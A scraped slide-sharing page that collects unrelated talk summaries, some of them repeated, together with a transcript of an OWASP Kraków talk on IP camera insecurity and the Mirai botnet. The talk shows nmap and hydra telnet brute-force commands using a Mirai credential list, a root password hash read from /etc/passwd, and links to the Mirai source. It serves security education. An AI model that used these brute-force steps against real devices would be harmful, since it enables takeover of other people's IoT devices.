The ABCs of Source-Assisted Web Application Penetration Testing With OWASP ZA...Denim Group
There are a number of reasons to use source code to assist in web application penetration testing such as making better use of penetration testers’ time, providing penetration testers with deeper insight into system behavior, and highlighting specific sections of so development teams can remediate vulnerabilities faster. Examples of these are provided using the open source ThreadFix plugin for the OWASP ZAP proxy and dynamic application security testing tool. These show opportunities attendees have to enhance their own penetration tests given access to source code.
This presentation covers the “ABCs” of source code assisted web application penetration testing: covering issues of attack surface enumeration, backdoor identification, and configuration issue discovery. Having access to the source lets an attacker enumerate all of the URLs and parameters an application exposes – essentially its attack surface. Knowing these allows pen testers greater application coverage during testing. In addition, access to source code can help to identify potential backdoors that have been intentionally added to the system. Comparing the results of blind spidering to a full attack surface model can identify items of interest such as hidden admin consoles or secret backdoor parameters. Finally, the presentation examines how access to source code can help identify configuration settings that may have an adverse impact on the security of the deployed application.
APNIC's Internet Security Specialist Jamie Gillespie presents on APNIC's Vulnerability Reporting Program at the Bhutan Cybersecurity Week 2021, held online from 20 to 25 December 2021.
MIRAI: What is It, How Does it Work and Why Should I Care?Memoori
Cyber Security in 2017! What can Smart Buildings expect?.
These are the slides from a conversation with Billy Rios, Founder of WhiteScope LLC. We take a deep dive into the Mirai DDoS Attacks from last year and try to understand what lessons can be learnt going forward.
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...Jason Trost
Honeypots are really useful for collecting security data for research, especially around botnets, scanning hosts, password brute forcers, and other misbehaving systems. They are also the cheapest way collect this data at scale. Deploying many types of honeypots across geo-diverse locations of the Internet improves the aggregate data quality and provides a holistic view. This provides insight into both global trends of attacks and network activity as well as the behaviors of individual malicious systems. For these reasons, we started the Modern Honey Network, which is both an open source (GPLv3) project and a community of hundreds of MHN servers that manage and aggregate data from thousands of heterogeneous honeypots (Dionaea, Kippo, Amun, Conpot, Wordpot, Shockpot, and Glastopf) and network sensors (Snort, Suricata, p0f) deployed by different individuals and organizations as a distributed sensor network. The project has turned into the largest crowdsourced honeynet in the world consisting of thousands of diverse sensors deployed across 35 countries and 5 continents worldwide. Sensors are operated by all sorts of people from hobbyists, to academic researchers, to Fortune 1000 companies. In this talk we will discuss our experience in starting this project, analyzing the data, and building a crowdsourced global sensor network for tracking security threats and gathering interesting data for research. We've found that lots of people like honeypots, especially if you give them a cool realtime visualization of their data and make it easy to setup; lots of organizations will share their data with you if it is part of a community; and lots of companies will deploy honeypots as additional network sensors, especially if you make it easy to deploy/manage/integrate with their existing security tools.
The ABCs of Source-Assisted Web Application Penetration Testing With OWASP ZA...Denim Group
There are a number of reasons to use source code to assist in web application penetration testing such as making better use of penetration testers’ time, providing penetration testers with deeper insight into system behavior, and highlighting specific sections of so development teams can remediate vulnerabilities faster. Examples of these are provided using the open source ThreadFix plugin for the OWASP ZAP proxy and dynamic application security testing tool. These show opportunities attendees have to enhance their own penetration tests given access to source code.
This presentation covers the “ABCs” of source code assisted web application penetration testing: covering issues of attack surface enumeration, backdoor identification, and configuration issue discovery. Having access to the source lets an attacker enumerate all of the URLs and parameters an application exposes – essentially its attack surface. Knowing these allows pen testers greater application coverage during testing. In addition, access to source code can help to identify potential backdoors that have been intentionally added to the system. Comparing the results of blind spidering to a full attack surface model can identify items of interest such as hidden admin consoles or secret backdoor parameters. Finally, the presentation examines how access to source code can help identify configuration settings that may have an adverse impact on the security of the deployed application.
APNIC's Internet Security Specialist Jamie Gillespie presents on APNIC's Vulnerability Reporting Program at the Bhutan Cybersecurity Week 2021, held online from 20 to 25 December 2021.
MIRAI: What is It, How Does it Work and Why Should I Care?Memoori
Cyber Security in 2017! What can Smart Buildings expect?.
These are the slides from a conversation with Billy Rios, Founder of WhiteScope LLC. We take a deep dive into the Mirai DDoS Attacks from last year and try to understand what lessons can be learnt going forward.
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...Jason Trost
Honeypots are really useful for collecting security data for research, especially around botnets, scanning hosts, password brute forcers, and other misbehaving systems. They are also the cheapest way collect this data at scale. Deploying many types of honeypots across geo-diverse locations of the Internet improves the aggregate data quality and provides a holistic view. This provides insight into both global trends of attacks and network activity as well as the behaviors of individual malicious systems. For these reasons, we started the Modern Honey Network, which is both an open source (GPLv3) project and a community of hundreds of MHN servers that manage and aggregate data from thousands of heterogeneous honeypots (Dionaea, Kippo, Amun, Conpot, Wordpot, Shockpot, and Glastopf) and network sensors (Snort, Suricata, p0f) deployed by different individuals and organizations as a distributed sensor network. The project has turned into the largest crowdsourced honeynet in the world consisting of thousands of diverse sensors deployed across 35 countries and 5 continents worldwide. Sensors are operated by all sorts of people from hobbyists, to academic researchers, to Fortune 1000 companies. In this talk we will discuss our experience in starting this project, analyzing the data, and building a crowdsourced global sensor network for tracking security threats and gathering interesting data for research. We've found that lots of people like honeypots, especially if you give them a cool realtime visualization of their data and make it easy to setup; lots of organizations will share their data with you if it is part of a community; and lots of companies will deploy honeypots as additional network sensors, especially if you make it easy to deploy/manage/integrate with their existing security tools.
Fraud in digital advertising botnet baseline summery ziv ginsbergZiv Ginsberg
Fraud in Digital Advertising Botnet Baseline Summery - Ziv Ginsberg
This is a summery of the 50 pages research thet made on the field of botnet by white ops.
SANS CTI Summit 2016 Borderless Threat IntelligenceJason Trost
This past year was the year of the data breach. Large and small organizations across every industry vertical were impacted by compromises that ranged from theft of PII, intellectual property, and financial information to publication of entire backend databases and email spools. The data from these breaches often wound up being exposed publicly, exchanged or sold on underground markets, or simply leveraged to breach other organizations. Many of these breaches have cascading effects due to the transitive nature of security that exists across many companies. Many companies rely on critical business partners, subsidiaries, and other organizations whose services are trusted. Also, due to password reuse customers accounts included in a 3rd party data dump could enable unauthorized access to another business's assets.
In this talk we outline through case studies several ways that Threat Intelligence is being used today to improve the security and awareness of organizations by monitoring "supply chain" partners, customers, and trusted 3rd parties. Specifically we will discuss brand monitoring, mass credential compromises, signs of infection/compromise, and signs of targeting and social networking data-mining. We will outline how organizations can effectively integrate this practice into their existing security programs.
This talk is going to give an overview of Android operating system and it´s apps ecosystem from the security point of view of a penetration tester.
So lets dive into topics like Pentest Environment Setup, Tools of the Trade, App Analysis and some security hints for Android developers.
Состояние сетевой безопасности в 2016 году Qrator Labs
Отчёт компаний Qrator и Wallarm, представленный вашему вниманию, посвящён главным событиям и основным тенденциям в области сетевой безопасности.
Отдельное внимание в отчёте уделяется проблематике DDoS, инфраструктуры Интернета и уязвимостям, а также взломам широко используемого ПО и других продуктов с электронной составляющей — устройств, подключённых к Сети.
Serverless is new trend in software development. It’s confusing many developers around the world. In this talk I’ll explain how to build not only crop images or select data from DynamoDB, but build real application, what kind of troubles are we should expect, how to make decision is your task fit into serverless architecture in Python or may be you should use, general approach. How fast serverless applications and more important how to scale it.
Lightning Talk: From Sinatra to Grape.pdfRenato675806
When AppTweak started we used Sinatra for our APIs but as time went by we were looking for a better solution to help us document our endpoints, both internal and external. Then we chose Grape.
Serverless applications in Python sounds, strange isn’t? In this talk I’ll explain how to build not only crop images or select data from DynamoDB, but build real application, what kind of troubles are we should expect, how to make decision is your task fit into serverless architecture in Python or may be you should use, general approach. How fast serverless applications
written in Python, and more important how to scale it.
Some slides demonstrating what ZeroMQ is and how it can be used from Scala, with the native Scala-ZeroMQ binding or the Akka-zeromq module.
Acually, code examples are on a GitHub repository here: https://github.com/fanf/scala_zeromq.
The presentation was given on 2013-08-21 at the Paris Scala User Group.
"Crypto wallets security. For developers", Julia PotapenkoFwdays
From a security perspective, cryptocurrency wallets are just applications. Similar to banking apps, wallets operate users’ funds and allow making transactions. But are they as secure as banking apps? Let’s talk about the risks and threats of crypto wallets, then move to design concerns and implementation issues. What types of data should be protected? What are the most common vulnerabilities? And why encrypting data is not as trivial as it may seem?
Hadoop application architectures - using Customer 360 as an examplehadooparchbook
Hadoop application architectures - using Customer 360 (more generally, Entity 360) as an example. By Ted Malaska, Jonathan Seidman and Mark Grover at Strata + Hadoop World 2016 in NYC.
Артем Гавриченков "The Dark Side of Things: Distributed Denial of Service Att...Tanya Denisyuk
С начала атак на блог Брайана Кребса прошла, по меркам IT-индустрии, уже целая вечность (месяц), и самое время изучить ситуацию и сделать из неё полезные выводы. 22 октября на площадке HighLoad Dev Conf мы проанализируем и обсудим:
- Что изменилось на рынке DDoS-атак в 2016 году;
- Каковы обстоятельства атаки, обрушившей Akamai и Google, что привело к этому и как от этого защититься;
- Как ситуация будет развиваться дальше.
Gestire la qualità del codice con Visual Studio, SonarQube ed Azure DevopsGian Maria Ricci
Come tenere sotto controllo la qualità del proprio codice tramite gli analizzatori di Sonar Qube sia dentro visual studio, sia tramite analisi automatiche del codice fatte tramite Azure DevOps Pipeoine
Technology First
16th Annual Ohio Information Security Conference
OISC 2019
#OISC19
The OWASP Top 10 & AppSec Primer
By Matt Scheurer (@c3rkah)
Dayton, Ohio
Date: 03/13/2019
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG) and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences all over the Ohio, Indiana, and Kentucky Tri-State. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), and Information Systems Security Association (ISSA).
IAA Life in Lockdown series: Securing Internet RoutingAPNIC
APNIC Training Delivery Manager Tashi Phuntsho, presents on practical ways to implement RPKI at the IAA Life in Lockdown online event, 'how to stop heists, hijacks and hostages', held on 21 July 2020.
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
In todays IT security world, we accept and embrace that the technology is constantly changing, we are very often still amazed at the rapid growth of the technology evolution and how it has far superseded beyond expectations, whilst thinking about the potential uses of this new technology we get excited and then it hits us! What about the security implications for our organization?? Holy Crap what did you say about SS7?
In this presentation, Wayne will take you through some real live demonstrations of Network Crypto Hacking and Exploitation using the latest custom built, SWAT (Special Weapons and Technology) cyber-warfare hacking tools.
To help us defend against the latest threats, that sends our risk rating scores off the chart? We do as we have always done! Research the threat viability, learn and deploy defense and mitigation options. For this very reason its imperative for us to stay up-to date with new emerging threats tactics.
Project “The Interceptor”: Owning anti-drone systems with nanodronesPriyanka Aash
"Antidrone system industries have arised. Due to several, and even classic, vulnerabilities in communication systems now used by drones , anti-drone systems are able to take down those drone by means of well documented attacks.
Drone/antidrone competition has already been set into the scene. This talk provides a new vision about drone protection against anti-drone systems, presenting ""The Interceptor Project"", a hand-sized nano drone based on single-core tiniest Linux Board: Vocore2.
This Linux board manages a WiFi (side/hidden) bidirectional channel communication that cannot be deauthenticated and it is replay-resistant, keeping all 802.11 hacking capabilities and standard utilities as any other WiFi hacker drone, with only the built-in adapter of the tiny Vocore2. Also, a ""just in case"", fallback control by SDR is implemented taking advantage of all the goods that SDR radio gives. All embedded into a hand-sized aircraft to make detection and mitigation a real and new pain, with a very low budget: About $70."
Wikipedia’s Event Data Platform, Or: JSON Is Okay Too With Andrew Otto | Curr...HostedbyConfluent
Wikipedia’s Event Data Platform, Or: JSON Is Okay Too With Andrew Otto | Current 2022
The Wikimedia Foundation (which operates Wikipedia) has a different engineering environment than most organizations. We build systems using only Free and Open Source Software. We have a diverse and active developer community that contributes to our software. For privacy reasons, we own and run bare metal hardware. We care about open data, and strive to make our data publicly available.
Because of this, the way we build event driven architectures is different too. The data we produce should be easily consumable for both internal engineers as well as the public
developer community. Avro and other binary formats can make using data difficult, so we intentionally chose to avoid them.
This session will describe how and why we built Wikimedia's Event Data Platform using Kafka, JSON and JSONSchemas, and how we make our event data available to the world.
OWASP Poland 13 November 2018 - Martin Knobloch - Building Secure SoftwareOWASP
Presentation of OWASP Global Chairman of the Board - Martin Knobloch at OWASP Poland meeting in Warsaw on 13 November 2018. Great review of important OWASP Projects.
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesSanjeev Rampal
Talk presented at Kubernetes Community Day, New York, May 2024.
Technical summary of Multi-Cluster Kubernetes Networking architectures with focus on 4 key topics.
1) Key patterns for Multi-cluster architectures
2) Architectural comparison of several OSS/ CNCF projects to address these patterns
3) Evolution trends for the APIs of these projects
4) Some design recommendations & guidelines for adopting/ deploying these solutions.
This 7-second Brain Wave Ritual Attracts Money To You.!nirahealhty
Discover the power of a simple 7-second brain wave ritual that can attract wealth and abundance into your life. By tapping into specific brain frequencies, this technique helps you manifest financial success effortlessly. Ready to transform your financial future? Try this powerful ritual and start attracting money today!
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
ER(Entity Relationship) Diagram for online shopping - TAEHimani415946
https://bit.ly/3KACoyV
The ER diagram for the project is the foundation for the building of the database of the project. The properties, datatypes, and attributes are defined by the ER diagram.
2. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
We have all heard about it...
3. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Most often pointed manufacturer
4. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
No, it’s not us, it’s the users!
http://www.xiongmaitech.com/index.php/news/info/12/76
(only Chinese, I used Google translator)
5. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
6. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
My story...
• The best-priced IP camera
with PoE and ONVIF
• Management standard (was
supposed to) assure painless
integration of the video in my
installation.
7. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
8. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
9. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
10. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Malware embedded...
http://artfulhacker.com/post/142519805054/beware-even-things-on-amazon-come
https://ipcamtalk.com/threads/brenz-pl-malware-in-ip-cameras-what-now.12851/
http://forums.whirlpool.net.au/forum-replies.cfm?t=2362073&p=11&#r211
11. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Path traversal
12. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Auth bypass...
13. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
„CLOUD SERVICE”
14. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
The „cloud” service
# tcpdump host camera.local
18:48:41.290938 IP camera.local.49030 > ec2-
54-72-86-70.eu-west-
1.compute.amazonaws.com.8000: UDP, length 25
15. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
16. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Device login – no pass, static captcha, id=MAC ;)
17. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
FAQ
18. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
TELNET
19. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Nmap
root@kali:~# nmap 10.5.5.20
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-11-06 10:59 EST
Nmap scan report for 10.5.5.20
Host is up (0.019s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
554/tcp open rtsp
8899/tcp open ospf-lite
20. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Mirai credentials for brute-force
https://github.com/securing/mirai_credentials
21. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Now go and brute the telnet
• root@kali:~# hydra -C
mirai_creds.txt
telnet://10.5.5.20
22. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
few seconds later...
23. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
The telnet password
• I did not have the credentials few years ago...
• But the password was already known then.
No need to hack, search „password”
and the name of device in Russian
24. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Wait...
• But we have changed the default password,
didn’t we?
25. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
https://www.us-cert.gov/ncas/alerts/TA16-288A
26. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
So, where is the password?
# cat /etc/passwd
root:$1$RYIwEiRA$d5iRRVQ5ZeRTrJwGjRy.
B0:0:0:root:/:/bin/sh
# mount
/dev/root on / type cramfs
(ro,relatime)
27. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Can we change it?
# passwd
-sh: passwd: not found
# echo "better etc passwd" > /etc/passwd
-sh: can't create /etc/passwd: Read-only file system
# mount -o remount,rw /
# mount
/dev/root on / type cramfs (ro,relatime)
28. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
So, it looks like we have to reflash...
• The DVR (10.5.5.30) has telnet disabled.
• Firmware versions starting mid-2015.
• But for many models the upgrade is not
available ;)
• ... and the DVR still has telnet on 9527 ;) not
to mention other vulns
29. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
HOW TO UPGRADE FIRMWARE?
30. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Let’s imagine you are a regular camera user...
• You have bought a camera in the
nearest shop with cameras.
• You know your camera is
vulnerable and should be
upgraded.
• Try to find out how to do it, and
where to find the firmware.
31. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
How do you think will regular user do?
32. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
DEVICE SUPPLY CHAIN
33. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Various vendors – same device
34. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Supply chain
Board Support Package - drivers, bootloader, kernel-level SDK
Broadcom, Texas Instruments, HiSilicon, WindRiver...
Original Device Manufacturer – web interface, SDK, cloud...
usually unknown from China, Taiwan etc.
Original Equipment Manufacturer – composing, branding ODMs
+ support, license, warranty...
Value Added Reseller / Distributor
End user
Fabless manufacturing
35. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Supply chain
Board Support Package - drivers, bootloader, kernel-level SDK
Broadcom, Texas Instruments, HiSilicon, WindRiver...
Original Device Manufacturer – web interface, SDK, cloud...
usually unknown from China, Taiwan etc.
Original Equipment Manufacturer – composing, branding ODMs
+ support, license, warranty...
Value Added Reseller / Distributor
End user
Fabless manufacturing
Features, Price!
Features, Price!
Features, Price!
Features, Price!
36. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Supply chain
Board Support Package - drivers, bootloader, kernel-level SDK
Broadcom, Texas Instruments, HiSilicon, WindRiver...
Original Device Manufacturer – web interface, SDK, cloud...
usually unknown from China, Taiwan etc.
Original Equipment Manufacturer – composing, branding ODMs
+ support, license, warranty...
Value Added Reseller / Distributor
End user
Fabless manufacturing
Security?
?
?
?
37. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
MIRAI
38. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Back in 2012
Internet Census Project
http://internetcensus2012.bitbucket.org/paper.html
39. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
2012 vs 2016
https://www.malwaretech.com/2016/10/mapping-mirai-a-botnet-case-study.htmlhttp://internetcensus2012.bitbucket.org/paper.html
40. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Mirai source
https://github.com/jgamblin/Mirai-Source-Code/
Warning:
• The zip file for the is repo is being identified by some AV
programs as malware.
41. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Worth reading
• The original post with source code :
• Mirai-Source-Code-master/ForumPost.txt
42. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
How does it spread?
• mirai/bot/scanner.c
43. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Scans for random IPs with several exclusions ;)
44. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Next, tries to hit the telnet
• And once per ten also on 2323
45. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Password list
46. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Resolve C&C IP with DNS
47. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
CATCHING MIRAI
48. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
https://twitter.com/MiraiAttacks/
• Live feed of
commands sent to
500 „infected”
machines
49. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
How about dynamic analysis?
We will expose the camera’s telnet service
directly to the Internet.
... and see what happens.
https://asciinema.org/a/1tynlhzfs0lmw6t3bn5k40cu7
50. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Our setup
Devices: 2 cameras + 1 DVR
Router VPNs to public IP, exposes devices
telnet
Dump all traffic to/from devices for analysis
51. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Wireshark analysis
http://10.5.5.5/
mirai.pcap
• Right click ->
• Follow->
• TCP Stream
52. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Telnet session
„Hello, my name is ...”
53. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Check processor version
54. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Download payload into „upnp”
55. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
CNC connection establishement – dns query
56. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
C&C DNS
Thanks: Josh Pyorre, OpenDNSThanks: Josh Pyorre, OpenDNS
57. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
DNS – domain taken by FBI
Thanks: Josh Pyorre, OpenDNS
58. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Registrant ID: C4853993-CLUB
Registrant Name: Zee Gate
Registrant Street: 666 antichrist lane
Registrant City: San Diego
Registrant State/Province: CA
Registrant Postal Code: 92050
Registrant Country: US
Registrant Phone: +1.7603014069
Registrant Fax: +1.7603014069
Registrant Email: abuse@fbi.gov
Admin ID: C4853996-CLUB
Admin Name: Zee Gate
Admin Street: 666 antichrist lane
whois hightechcrime.club
59. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
CNC
60. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Scanning for new targets
61. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Other variants – DONGS ?
62. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
WHAT CAN WE DO?
63. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Set your DNS to 127.0.0.1?
64. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Not everyone can afford that ;)
65. Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
Features at low cost compromising on security is just obscene ;) Let’s do it better!